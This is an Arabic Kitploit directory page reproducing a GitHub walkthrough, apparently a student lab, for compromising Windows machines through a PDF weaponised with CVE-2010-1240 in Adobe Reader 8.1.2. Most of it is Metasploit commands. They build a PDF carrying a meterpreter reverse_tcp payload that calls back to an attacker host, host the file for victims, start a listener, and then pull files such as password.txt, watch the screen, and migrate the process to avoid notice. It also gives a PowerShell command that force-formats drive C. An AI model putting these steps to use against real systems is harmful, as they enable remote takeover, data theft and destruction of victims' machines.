Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Embedded-PDF — يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF يبدو غير ضار إلى الهدف، بينما يحتوي في الواقع على حمولة مدمجة. تم الكشف عن هذا الاستغلال علنًا باسم CVE-2010-1240. | Kitploit
أدوات/GitHubGitHub/jasmoon99/embedded-pdf
أدوات التصيدتوليد الحمولةالاستغلالما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالهندسة الاجتماعيةالتعلم والتعليمأداة الوصول عن بعد
GitHubjasmoon99/embedded-pdf

Embedded-PDF

يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF يبدو غير ضار إلى الهدف، بينما يحتوي في الواقع على حمولة مدمجة. تم الكشف عن هذا الاستغلال علنًا باسم CVE-2010-1240.

716منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

اتصال الباب الخلفي المدمج عبر ملفات PDF 😈

مقدَّم لكم من    

مقدمة

يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF يبدو بريئًا إلى الهدف، بينما يحتوي في الواقع على حمولة مدمجة (payload). وقد نُشر الاستغلال علنًا تحت المعرف CVE-2010-1240.

بمجرد فتح ملف PDF في Adobe Reader، فإن المستخدمين الذين نخدعهم للموافقة على النوافذ الأمنية المنبثقة سيسمحون لنا بالحصول على جلسة meterpreter متصلة بأجهزتهم عبر اتصال TCP عكسي. ومنذ تلك اللحظة، تكون جميع بياناتهم وكل ما يفعلونه في الوقت الحالي تحت مراقبتنا.

Hehe~Boi

قائمة البرامج/الأدوات

  • Metasploit
  • Adobe Reader <= 8.1.2

البيئة

Kali Linux         Windows 7 or 10         Adobe Reader        

  • جهاز المهاجم: Kali Linux الإصدار 2021.1
  • نظام تشغيل الهدف: Windows 10 (x86) أو Windows 7 (x86)
  • برنامج الهدف: Adobe Reader 8.1.2

الخطوات التفصيلية

أولًا، نُطلق MSFconsole التي توفر لنا واجهة سطر أوامر للوصول إلى إطار عمل Metasploit.

root@kitploit:~
msfconsole

بعد ذلك، نبحث عن الاستغلال المطابق لمنصة Windows الهدف وبرنامج Adobe PDF Reader، حيث سيعرض قائمة كاملة بالاستغلالات التي يمكن استخدامها لاختراق جهاز Windows الخاص بالضحية واستغلال ثغرات Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

في هذا الاستغلال، نختار ونستخدم الوحدة "adobe_pdf_embedded_exe" باستخدام الأمر أدناه لتحقيق هدف السيطرة على الضحية.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

يمكننا أيضًا الاطلاع على معلومات الاستغلال باستخدام الأمر "info" كما هو موضح أدناه:

root@kitploit:~
info

بعد ذلك، نضبط الحمولة (payload) لاستخدام اتصال TCP عكسي. ونستخدم أيضًا Meterpreter التي توفر واجهة أوامر تفاعلية تسهّل علينا استخدام جميع أنواع الوظائف من خلال إدخال الأكواد وتنفيذها لاستكشاف جهاز الضحية.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

بعد ذلك، سنضبط عنوان المضيف والمنفذ الخاصين بالاستماع. بالنسبة إلى LHOST، نحتاج إلى إدخال عنوان IP لجهاز المهاجم، وهو في هذه الحالة عنوان IP لجهاز Kali (10.0.2.4)*.

  • *ملاحظة جانبية
    • يجب عليك استخدام عنوان IP لجهاز Kali الخاص بك
    • يمكنك استخدام رقم منفذ مختلف

أما بالنسبة إلى LPORT، فالأمر متروك لنا لضبط رقم منفذ غير شائع الاستخدام.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

بعد ذلك، سنضبط ملف الإدخال ليكون أساسًا لملف PDF باستخدام علامة INFILENAME*. ثم سنضبط اسم الملف إلى اسم يجذب اهتمام الضحية لفتح ملف PDF الخبيث.

  • *ملاحظة جانبية
    • يجب عليك التأكد من مسار ملف PDF الخاص بك
    • يمكنك استخدام اسم ملف مختلف
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

يمكننا مراجعة خياراتنا مرة أخرى قبل إدخال أمر "exploit" لتوليد الحمولة مع ملف PDF.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

بمجرد الانتهاء من توليد ملف PDF، سننقل الملف إلى /var/www/html، وهو دليل جهاز Kali الخاص بنا لاستضافة خادم تطبيق الويب ليتمكن ضحيتنا من تنزيل ملف PDF لاحقًا.

  • ملاحظة:
    • إذا قمت بتعيين اسم ملف مختلف، فتأكد من نسخ المسار الصحيح بدلًا من ذلك!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

بعد ذلك، ولإعداد المستمع (listener) الخاص بنا، سنستخدم "exploit/multi/handler". مجددًا، سنضبط الحمولة وLHOST وLPORT بما يتوافق مع ما حددناه عند توليد ملف PDF الخبيث. ثم نشغّل الحمولة.

  • ملاحظة:
    • LHOST: يرجى ملاحظة عنوان IP لجهاز Kali الخاص بك
    • LPORT: إذا قمت بتعيين رقم منفذ مختلف، فتأكد من كتابة الرقم بشكل صحيح
    • show info أو show options أمر اختياري للتشغيل.
      • قم بتشغيله فقط للتحقق مما قمت بضبطه للتو
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

في طرفية أخرى، نتحقق من حالة خادم Apache للتأكد من أنه يعمل لاستضافة ملف PDF الخاص بنا في /var/www/html ليتمكن الضحية من تنزيل الملف.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

على جهاز Windows، افتح أي متصفح مثل Chrome واكتب عنوان IP الخاص بـ Kali (10.0.2.4)* للوصول إلى خادم تطبيق الويب الخاص بجهاز Kali.

*ملاحظة:* يرجى ملاحظة عنوان IP لجهاز Kali الخاص بك

بعد ذلك، حاكِ مستخدمًا يحفظ ملف PDF المقصود.

بمجرد فتح الضحية للملف في Adobe Reader 8.1.2 وقبولها رسائل الأمان المنبثقة، يمكننا حينها ملاحظة وجود جلسة جديدة متصلة عبر اتصال TCP عكسي على جهاز Kali.

في سيناريو واقعي، سنقوم بإعداد موقع ويب يحتوي على ملف PDF المدمج بالحمولة ليتمكن الضحية من تنزيل الملف أو إرفاقه عبر البريد الإلكتروني.


نتيجة الاستغلال

بعد ذلك، يمكننا الوصول عن بُعد إلى جهاز الضحية وتنفيذ المزيد من السلوكيات الخبيثة التي نرغب بها داخل جلسة meterpreter.

لعرض قائمة بالأشياء التي يمكننا القيام بها

root@kitploit:~
help

عرض الدليل الحالي

root@kitploit:~
pwd

عرض الملفات في ذلك الدليل

root@kitploit:~
ls

تنزيل مجلد أو ملف من جهاز الضحية

على سبيل المثال، إذا وُجد ملف باسم password.txt، يمكننا إصدار الأمر download password.txt

root@kitploit:~
download [folder name | filename with extension]

إنشاء ملف على جهاز الضحية

بالطبع، يمكننا كتابة سكربت خبيث (زرع باب خلفي) لإبقاء اتصالنا بجهاز Windows إذا كنا أشرارًا حقًا! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

التفاعل مع Windows

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

إضافي

ومع ذلك، يمكن للمهاجم تقليل الشكوك عن طريق ترحيل عملية meterpreter إلى عملية أخرى باستخدام وحدة migrate في جلسة meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

هنا، سينشئ تلقائيًا عملية جديدة في جهاز الضحية ليرحّل نفسه إليها. وعندها يمكن للضحية حذف ملف PDF المصاب دون أن تدري إطلاقًا أن العملية قد انتقلت بالفعل إلى مكان آخر.

يمكن للمهاجم أيضًا إنشاء سكربت خبيث على الجهاز الهدف باستخدام موجه الأوامر (cmd) أو PowerShell، وهو قادر على تعطيل نظام التشغيل بالكامل ومنعه من العمل بشكل سليم.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

فيديو توضيحي

عرض

تنزيل الأداة